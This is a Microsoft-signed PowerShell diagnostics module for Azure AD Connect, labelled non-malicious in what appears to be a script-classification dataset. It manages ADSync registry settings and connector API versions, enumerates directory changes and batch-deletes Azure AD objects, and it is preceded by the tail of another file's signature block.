7zqk+iJsiMlKG2HyrhBeb7zReZtZGGDl7im1AyqkzvGDGU9pBXMoCfsiEJMioJAZ # Gkwx8tMr2IRDrzxj/5jbINIJK1TB6v1qg+cQoxJx9dbX4RJ61eBWWs7qAVtoZVvB # P1hSM6k1YU4iy4HKNqMSywbWzxtNGH65krkSz0Am2Jo2hbMVqkeThGsHu7zVs94l # ABGJAGjBKTzqPi3uUKvXHDAGeDylECNnkQIDAQABo4IDVDCCA1AwDgYDVR0PAQH/ # BAQDAgEGMBMGA1UdJQQMMAoGCCsGAQUFBwMDMIIBwwYDVR0gBIIBujCCAbYwggGy # BghghkgBhv1sAzCCAaQwOgYIKwYBBQUHAgEWLmh0dHA6Ly93d3cuZGlnaWNlcnQu # Y29tL3NzbC1jcHMtcmVwb3NpdG9yeS5odG0wggFkBggrBgEFBQcCAjCCAVYeggFS # AEEAbgB5ACAAdQBzAGUAIABvAGYAIAB0AGgAaQBzACAAQwBlAHIAdABpAGYAaQBj # AGEAdABlACAAYwBvAG4AcwB0AGkAdAB1AHQAZQBzACAAYQBjAGMAZQBwAHQAYQBu # AGMAZQAgAG8AZgAgAHQAaABlACAARABpAGcAaQBDAGUAcgB0ACAARQBWACAAQwBQ # AFMAIABhAG4AZAAgAHQAaABlACAAUgBlAGwAeQBpAG4AZwAgAFAAYQByAHQAeQAg # AEEAZwByAGUAZQBtAGUAbgB0ACAAdwBoAGkAYwBoACAAbABpAG0AaQB0ACAAbABp # AGEAYgBpAGwAaQB0AHkAIABhAG4AZAAgAGEAcgBlACAAaQBuAGMAbwByAHAAbwBy # AGEAdABlAGQAIABoAGUAcgBlAGkAbgAgAGIAeQAgAHIAZQBmAGUAcgBlAG4AYwBl # AC4wDwYDVR0TAQH/BAUwAwEB/zB/BggrBgEFBQcBAQRzMHEwJAYIKwYBBQUHMAGG # GGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBJBggrBgEFBQcwAoY9aHR0cDovL2Nh # Y2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0SGlnaEFzc3VyYW5jZUVWUm9vdENB # LmNydDCBjwYDVR0fBIGHMIGEMECgPqA8hjpodHRwOi8vY3JsMy5kaWdpY2VydC5j # b20vRGlnaUNlcnRIaWdoQXNzdXJhbmNlRVZSb290Q0EuY3JsMECgPqA8hjpodHRw # Oi8vY3JsNC5kaWdpY2VydC5jb20vRGlnaUNlcnRIaWdoQXNzdXJhbmNlRVZSb290 # Q0EuY3JsMB0GA1UdDgQWBBSXSAPrFQhrubJYI8yULvHGZdJkjjAfBgNVHSMEGDAW # gBSxPsNpA/i/RwHUmCYaCALvY2QrwzANBgkqhkiG9w0BAQUFAAOCAQEAggXpha+n # TL+vzj2y6mCxaN5nwtLLJuDDL5u1aw5TkIX2m+A1Av/6aYOqtHQyFDwuEEwomwqt # CAn584QRk4/LYEBW6XcvabKDmVWrRySWy39LsBC0l7/EpZkG/o7sFFAeXleXy0e5 # NNn8OqL/UCnCCmIE7t6WOm+gwoUPb/wI5DJ704SuaWAJRiac6PD//4bZyAk6ZsOn # No8YT+ixlpIuTr4LpzOQrrxuT/F+jbRGDmT5WQYiIWQAS+J6CAPnvImQnkJPAcC2 # Fn916kaypVQvjJPNETY0aihXzJQ/6XzIGAMDBH5D2vmXoVlH2hKq4G04AF01K8Ui # hssGyrx6TT0mRjGCA6wwggOoAgEBMIGHMHMxCzAJBgNVBAYTAlVTMRUwEwYDVQQK # EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xMjAwBgNV # BAMTKURpZ2lDZXJ0IEhpZ2ggQXNzdXJhbmNlIENvZGUgU2lnbmluZyBDQS0xAhAO # aQaYwhTIerW2BLkWPNGQMAkGBSsOAwIaBQCgeDAYBgorBgEEAYI3AgEMMQowCKAC # gAChAoAAMBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3AgEEMBwGCisGAQQBgjcCAQsx # DjAMBgorBgEEAYI3AgEVMCMGCSqGSIb3DQEJBDEWBBTBjSgoFuawl9Ao5Tv2xqPO # 3Kl4sDANBgkqhkiG9w0BAQEFAASCAQA5AQUWDBjbcGyAveEi6lzwSWZf7xIx87zm # U80EVwu1VDqIcgN4jyUMf7ni8qrZsSZoc4e4xj3tSRmMjZPd7M5C+DL8ZBitU4VV # X6VT86ANs+njcZ+2eVZtZW9jYYG42TJN507NcDL1KilaSRyrUUJfBcSFaa+UN2pQ # n0/GNPYoZxZwdho0IVdIJifBO61IqYVCWNL3CNfaTvBVVbEXA70LG3yKUoQdEvpV # /3Eyd3fJzdmHZGpKwq8Wf/tlMN7dVM59GG0SGE81FASCJNno18MKKY7vWLGoo3Fc # drZCFDm8Wq/Q/M10mKEFWzlztThqxeUx/3oA2TKLM2eUtA4PVw+QoYIBfzCCAXsG # CSqGSIb3DQEJBjGCAWwwggFoAgEBMGcwUzELMAkGA1UEBhMCVVMxFzAVBgNVBAoT # DlZlcmlTaWduLCBJbmMuMSswKQYDVQQDEyJWZXJpU2lnbiBUaW1lIFN0YW1waW5n # IFNlcnZpY2VzIENBAhB5oqWF+dEVQhPZuD72to3tMAkGBSsOAwIaBQCgXTAYBgkq # hkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0xMjA2MjEwNTA1 # MTJaMCMGCSqGSIb3DQEJBDEWBBS/y8ZQJu39fwfbrPlsNYHdOEbIWjANBgkqhkiG # 9w0BAQEFAASBgBVlS+jMlhYAmeerqAJAXyX18fe2m/quZkq09V6c2OOSzWmcHMwT # +sgJDVKPmImnn7YT0tL8SyIflxmVVapR3pAnzFq5XXVmYqxu3+g1rSRxUQyCmEwU # p84MHiU+17yfE+KbvT0/Y+jv71MnbkUOeqAKH2+fGdiR6pSO+zKoiH/q # SIG # End signature block
combined_dataset/train/non-malicious/sample_24_28.ps1
sample_24_28.ps1
#------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. #------------------------------------------------------------------------- $ErrorActionPreference = "Stop" $paramsRegKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters\' if (Test-Path $paramsRegKey) { $installationDirectory = (Get-ItemProperty $paramsRegKey -Name Path).Path Import-Module "$installationDirectory\Bin\ADSync\ADSync.psd1" Add-Type -Path "$installationDirectory\Bin\Assemblies\Microsoft.MetadirectoryServicesEx.dll" Add-Type -Path "$installationDirectory\Bin\Microsoft.MetadirectoryServices.PasswordHashSynchronization.Types.dll" Add-Type -Path "$installationDirectory\Extensions\Microsoft.Azure.ActiveDirectory.Connector.dll" } else { Write-Warning -Message "AADConnect installation was not found. Using current directory. Some functionality may be unavailable." Add-Type -Path "$PSScriptRoot\Microsoft.MetadirectoryServicesEx.dll" Add-Type -Path "$PSScriptRoot\Microsoft.MetadirectoryServices.PasswordHashSynchronization.Types.dll" Add-Type -Path "$PSScriptRoot\Microsoft.Azure.ActiveDirectory.Connector.dll" } function Get-ADSyncAADConnectorImportApiVersion { $paramRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters" $paramRegName = "AadConnectorImportApiVersion" $version = (Get-ItemProperty -Path $paramRegKey | Select $paramRegName).$paramRegName if (-not $version) { $version = 2 } Write-Output $version } function Get-ADSyncAADConnectorExportApiVersion { $aad = Get-ADSyncConnector -Identifier b891884f-051e-4a83-95af-2544101c9083 $aadRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters\PerMAInstance\" + $aad.Name $aadRegName = "EnableNonExistentObjectReferenceExportFiltering" $paramRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters" $paramRegName = "AadConnectorExportApiVersion" $exportType = $aad.ExtensionConfiguration.ExportType $enableNonExistentObjectReferenceExportFiltering = 1 if (Test-Path -Path $aadRegKey) { $enableNonExistentObjectReferenceExportFiltering = (Get-ItemProperty -Path $aadRegKey | Select $aadRegName).$aadRegName if ([string]::IsNullOrEmpty($enableNonExistentObjectReferenceExportFiltering)) { $enableNonExistentObjectReferenceExportFiltering = 1 } } $version = (Get-ItemProperty -Path $paramRegKey | Select $paramRegName).$paramRegName if (-not $version) { $version = 2 } if ($version -eq 1) { if ($exportType -ne 2 -or $enableNonExistentObjectReferenceExportFiltering -ne 0) { Write-Error "Version mismatch in Registry and AAD Connector. Run Set-ADSyncAADConnectorExportApiVersion to fix the issue" return } } elseif ($version -eq 2) { if ($exportType -ne 5 -or $enableNonExistentObjectReferenceExportFiltering -ne 1) { Write-Error "Version mismatch in Registry and AAD Connector. Run Set-ADSyncAADConnectorExportApiVersion to fix the issue" return } } else { Write-Error "unknown version $version" return } Write-Output $version } function Set-ADSyncAADConnectorImportApiVersion { Param ( [Parameter(Mandatory=$true)] [int] $version ) $regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters" $regName = "AadConnectorImportApiVersion" if (($version -ne 1) -and ($version -ne 2)) { Write-Error "unknown version $version" } Set-ItemProperty -path $regKey -name $regName -value $version Write-Output $version } function Set-ADSyncAADConnectorExportApiVersion { Param ( [Parameter(Mandatory=$true)] [int] $version ) $paramRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters" $regName = "AadConnectorExportApiVersion" $exportType = $null; $enableNonExistentObjectReferenceExportFiltering = 1; if ($version -eq 1) { $exportType = 2 $enableNonExistentObjectReferenceExportFiltering = 0 } elseif ($version -eq 2) { $exportType = 5 $enableNonExistentObjectReferenceExportFiltering = 1 } else { Write-Error "unknown version $version" } Set-ItemProperty -path $paramRegKey -name $regName -value $version $aad = Get-ADSyncConnector -Identifier b891884f-051e-4a83-95af-2544101c9083 $perMaInstanceRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters\PerMAInstance\" if (-not (Test-Path -Path $perMaInstanceRegKey)) { New-Item -Path $perMaInstanceRegKey | Out-Null } $aadRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters\PerMAInstance\" + $aad.Name if (-not (Test-Path -Path $aadRegKey)) { New-Item -Path $aadRegKey | Out-Null } Set-ItemProperty -Path $aadRegKey -Name "EnableNonExistentObjectReferenceExportFiltering" -Value $enableNonExistentObjectReferenceExportFiltering $aad.ExtensionConfiguration.ExportType = $exportType $aad = Add-ADSyncConnector -Connector $aad Write-Output $version } function ConvertTo-ADSyncSourceAnchor { Param ( [Parameter(Mandatory=$true)] [string] $dn ) $result = [Microsoft.Online.DirSync.Extension.Utilities.DNEncoding]::SafeRdnToString($dn); Write-Output $result } function ConvertTo-ADSyncAadDistinguishedName { Param ( [Parameter(Mandatory=$true)] [string] $sourceAnchor ) $result = [Microsoft.Online.DirSync.Extension.Utilities.DNEncoding]::StringToSafeRdn($sourceAnchor); Write-Output $result } function ConvertTo-ADSyncCloudAnchor { Param ( [Parameter(Mandatory=$true)] [string] $encodedB64Anchor ) $encodedRawAnchor = [System.Convert]::FromBase64String($encodedB64Anchor); $rawAnchor = $encodedRawAnchor[4..($encodedRawAnchor.Length - 3)] $cloudAnchor = [System.Text.Encoding]::Unicode.GetString($rawAnchor) Write-Output $cloudAnchor } function Set-ADSyncMaxImportRefetchSize { Param ( [Parameter(Mandatory=$true)] [int] $size ) $paramRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters" $regName = "MaxImportRefetchSize" Set-ItemProperty -path $paramRegKey -name $regName -value $size Write-Output $size } function Enable-ADSyncAADConnectorReferenceObsoletion { $aadConnector = Get-ADSyncConnector -Identifier b891884f-051e-4a83-95af-2544101c9083 $perMaInstanceRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters\PerMAInstance\" if (-not (Test-Path -Path $perMaInstanceRegKey)) { New-Item -Path $perMaInstanceRegKey | Out-Null } $aadConnectorRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters\PerMAInstance\" + $aadConnector.Name if (-not (Test-Path -Path $aadConnectorRegKey)) { New-Item -Path $aadConnectorRegKey | Out-Null } Set-ItemProperty -Path $aadConnectorRegKey -Name "EnableReferenceObsoletion" -Value 1 Write-Output $true } function Disable-ADSyncAADConnectorReferenceObsoletion { $aadConnector = Get-ADSyncConnector -Identifier b891884f-051e-4a83-95af-2544101c9083 $perMaInstanceRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters\PerMAInstance\" if (-not (Test-Path -Path $perMaInstanceRegKey)) { New-Item -Path $perMaInstanceRegKey | Out-Null } $aadConnectorRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters\PerMAInstance\" + $aadConnector.Name if (-not (Test-Path -Path $aadConnectorRegKey)) { New-Item -Path $aadConnectorRegKey | Out-Null } Set-ItemProperty -Path $aadConnectorRegKey -Name "EnableReferenceObsoletion" -Value 0 Write-Output $true } # # Sample usage: # Full import: Get-ADSyncAadDirectoryChanges -creds $creds -version 2 # function Get-ADSyncAadDirectoryChanges { Param ( [Parameter(Mandatory=$true)] [PSCredential] $creds, [Parameter(Mandatory=$false)] [byte[]] $watermark, [Parameter(Mandatory=$false)] [int] $version = 1, [Parameter(Mandatory=$false)] [string[]] $objectClassFilter ) $enumerator = ` [Microsoft.Azure.ActiveDirectory.Connector.Diagnostics.DiagnosticsFactory]::CreateChangeEnumerator( ` $creds.UserName, ` $creds.Password, $objectClassFilter, ` $watermark, ` ($watermark -eq $null), ` $version) try { while ($true) { $res = $enumerator.EnumerateNextBatch() Write-Output $res if (-not $res.AadBatch.MoreToRead) { break; } } } finally { $enumerator.Dispose() } } # # Sample usage: # Collect AAD user object DNs to delete in file userDNs.txt and run: # Remove-ADSyncAadObjects -creds $creds -entries $( type .\userDNs.txt | ForEach-Object { [Microsoft.Azure.ActiveDirectory.Connector.Diagnostics.DeletionEntry]::FromDistinguishedName("user", $_) } ) # function Remove-ADSyncAadObjects { Param ( [Parameter(Mandatory=$true)] [PSCredential] $creds, [Parameter(Mandatory=$true)] [Microsoft.Azure.ActiveDirectory.Connector.Diagnostics.DeletionEntry[]] $entries ) $len = $entries.Count $entriesProcessed = 0 $batchSize = 10 $exporter = ` [Microsoft.Azure.ActiveDirectory.Connector.Diagnostics.DiagnosticsFactory]::CreateDirectoryChangeExporter( ` $creds.UserName, ` $creds.Password) try { while ($entriesProcessed -lt $len) { $nextBatch = $entries | Select-Object -First $batchSize $entries = $entries | Select-Object -Skip $batchSize $results = $exporter.ExportDeletions([Microsoft.Azure.ActiveDirectory.Connector.Diagnostics.DeletionEntry[]]$nextBatch) Write-Output $results $entriesProcessed += $nextBatch.Count } } finally { $exporter.Dispose() } } # SIG # Begin signature block # MIIoNwYJKoZIhvcNAQcCoIIoKDCCKCQCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBnSNOH//dxFJEH # 2xhnTU7oLyyJAofe9EQ2s8CBSTa1HKCCDYIwggYAMIID6KADAgECAhMzAAADXJXz # SFtKBGrPAAAAAANcMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMwNDA2MTgyOTIyWhcNMjQwNDAyMTgyOTIyWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDijA1UCC84R0x+9Vr/vQhPNbfvIOBFfymE+kuP+nho3ixnjyv6vdnUpgmm6RT/ # pL9cXL27zmgVMw7ivmLjR5dIm6qlovdrc5QRrkewnuQHnvhVnLm+pLyIiWp6Tow3 # ZrkoiVdip47m+pOBYlw/vrkb8Pju4XdA48U8okWmqTId2CbZTd8yZbwdHb8lPviE # NMKzQ2bAjytWVEp3y74xc8E4P6hdBRynKGF6vvS6sGB9tBrvu4n9mn7M99rp//7k # ku5t/q3bbMjg/6L6mDePok6Ipb22+9Fzpq5sy+CkJmvCNGPo9U8fA152JPrt14uJ # ffVvbY5i9jrGQTfV+UAQ8ncPAgMBAAGjggF/MIIBezArBgNVHSUEJDAiBgorBgEE # AYI3TBMBBgorBgEEAYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUXgIsrR+tkOQ8 # 10ekOnvvfQDgTHAwRQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEWMBQGA1UEBRMNMjMzMTEwKzUwMDg2ODAfBgNVHSMEGDAWgBRI # bmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3 # Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEt # MDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBABIm # T2UTYlls5t6i5kWaqI7sEfIKgNquF8Ex9yMEz+QMmc2FjaIF/HQQdpJZaEtDM1Xm # 07VD4JvNJEplZ91A4SIxjHzqgLegfkyc384P7Nn+SJL3XK2FK+VAFxdvZNXcrkt2 # WoAtKo0PclJOmHheHImWSqfCxRispYkKT9w7J/84fidQxSj83NPqoCfUmcy3bWKY # jRZ6PPDXlXERRvl825dXOfmCKGYJXHKyOEcU8/6djs7TDyK0eH9ss4G9mjPnVZzq # Gi/qxxtbddZtkREDd0Acdj947/BTwsYLuQPz7SNNUAmlZOvWALPU7OOVQlEZzO8u # Ec+QH24nep/yhKvFYp4sHtxUKm1ZPV4xdArhzxJGo48Be74kxL7q2AlTyValLV98 # u3FY07rNo4Xg9PMHC6sEAb0tSplojOHFtGtNb0r+sioSttvd8IyaMSfCPwhUxp+B # Td0exzQ1KnRSBOZpxZ8h0HmOlMJOInwFqrCvn5IjrSdjxKa/PzOTFPIYAfMZ4hJn # uKu15EUuv/f0Tmgrlfw+cC0HCz/5WnpWiFso2IPHZyfdbbOXO2EZ9gzB1wmNkbBz # hj8hFyImnycY+94Eo2GLavVTtgBiCcG1ILyQabKDbL7Vh/OearAxcRAmcuVAha07 # WiQx2aLghOSaZzKFOx44LmwUxRuaJ4vO/PRZ7EzAMIIHejCCBWKgAwIBAgIKYQ6Q # 0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5 # WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQD # Ex9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0B # AQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4 # BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe # 0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato # 88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v # ++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDst # rjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN # 91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4ji # JV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmh # D+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbi # wZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8Hh # hUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaI # jAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTl # UAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNV # HQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQF # TuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29m # dC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNf # MjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5t # aWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNf # MjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcC # ARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnlj # cHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5 # AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oal # mOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0ep # o/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1 # HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtY # SWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInW # H8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZ # iWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMd # YzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7f # QccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKf # enoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOpp # O6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZO # SEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgswghoHAgEBMIGVMH4xCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jv # c29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAANclfNIW0oEas8AAAAAA1ww # DQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYK # KwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIH7etgK0 # 1m0cpKZLIFLzKuZUbQG5dQtqPRa/kVGcNYnpMEIGCisGAQQBgjcCAQwxNDAyoBSA # EgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20w # DQYJKoZIhvcNAQEBBQAEggEAevUJ+qtx0CQ9tZtASDEk4WfDBv71ycLk7WpFg+H5 # I244PTHu6stIIqNCl6/KSSyi2IhhcxQQ0A/b2vhoL+lhMLuijo8vH65q+E6/mT0h # cz0dDzS9LjSlM2j6YZWqeLZTP7K+G1kncdb+Bj0LWnn4enkAUFpCUs9rB8ss2Ea1 # 9u3uaZ+1XaGCJEQkwLuo1ga6LCeqLJn63EXLjcwW5oSTwgXdkcnT2ieIsgAgHgsc # 9tpsFRMNbfAtAonL4OAEf9AMgMfyUxRB3dn3eHbjG9xDhg/AKAhhKGFSIw10C5pd # oX7EIrIuRQ45jxHETXwZER0laYk/Ubm+c19nCIPTSWJI5aGCF5UwgheRBgorBgEE # AYI3AwMBMYIXgTCCF30GCSqGSIb3DQEHAqCCF24wghdqAgEDMQ8wDQYJYIZIAWUD # BAIBBQAwggFRBgsqhkiG9w0BCRABBKCCAUAEggE8MIIBOAIBAQYKKwYBBAGEWQoD # ATAxMA0GCWCGSAFlAwQCAQUABCCtSBwBaQ5nRcWyHyUzXj3VOKPCuDVTVnsh3qZk # aWm35wIGZbpqoO8jGBIyMDI0MDIwMTAxNDE0NS41OFowBIACAfSggdGkgc4wgcsx # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJTAjBgNVBAsTHE1p # Y3Jvc29mdCBBbWVyaWNhIE9wZXJhdGlvbnMxJzAlBgNVBAsTHm5TaGllbGQgVFNT # IEVTTjo5NjAwLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3Rh # bXAgU2VydmljZaCCEewwggcgMIIFCKADAgECAhMzAAAB2PxLM6Ud2IUVAAEAAAHY # MA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5n # dG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9y # YXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4X # DTIzMDUyNTE5MTI0MFoXDTI0MDIwMTE5MTI0MFowgcsxCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xJTAjBgNVBAsTHE1pY3Jvc29mdCBBbWVyaWNh # IE9wZXJhdGlvbnMxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVTTjo5NjAwLTA1RTAt # RDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCCAiIw # DQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAM146ynR9eADPsZQXQ37/QQdxAWu # LrCWJNuZA2YWbwOLQJ5Dyfht3a13m1u3NOwSTt1jb+eZZj2SoS9q9t1hFs1z4Sy/ # w1+/owwiYf20KvkrGzbngxDSOalG5yube4dbjbUJ+9rSE1AQo3U1LStp3VT9k6Z7 # 5X9B5J1Yqh8JOHF/9+xN5HjVZupQ0Ak3+aXexs4fxouFfJMcbuxW39ZRIulPR8uU # 1dgZFfNq8nWpQ54/PKPzqGIrLNAktOMqvsalMYXJKIhwxb+fIro0rtGN/LWh8t1G # ++0ch0m+mY9LN7cIf89gVTbVOqEiFnX4BLtGUOjXwxIMY8elMJbCjuWC1jWljpG8 # 8iC4Xett22+GjKOfmY9uzmmCMY7zeh0E0/siUoCPgFsdRd4eK3cNraDsDiOJwqss # yOjqwZ560mh4qiiPmI1NdsPAsoz0eVR1dlLPrZ+0JlW4r0UGCQA70xE3amoGem0E # Z+WWb7bUUuToTe9VcwYcHl46AV8DLzheUiJ7JxACsgOwSb3YocgU4Y6BmVbF7r2V # 5e8weNgmWmjZVUy0vBct3e2NL/Xvei4YxFqIsicubigiCoO2NQiq/BhBSHdE3rDB # 0Xvmc6aumvzBHDWf8EpZDmaFDFowGqq+Ru67Wwt5Iw+/Y8xkh11c9uI68DFp2o+Q # Fww9QGavJJigtPHDAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU9tOPTHw9kEtifQxk # EjqcaHmoiVYwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYDVR0f # BFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwv # TWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwGCCsG # 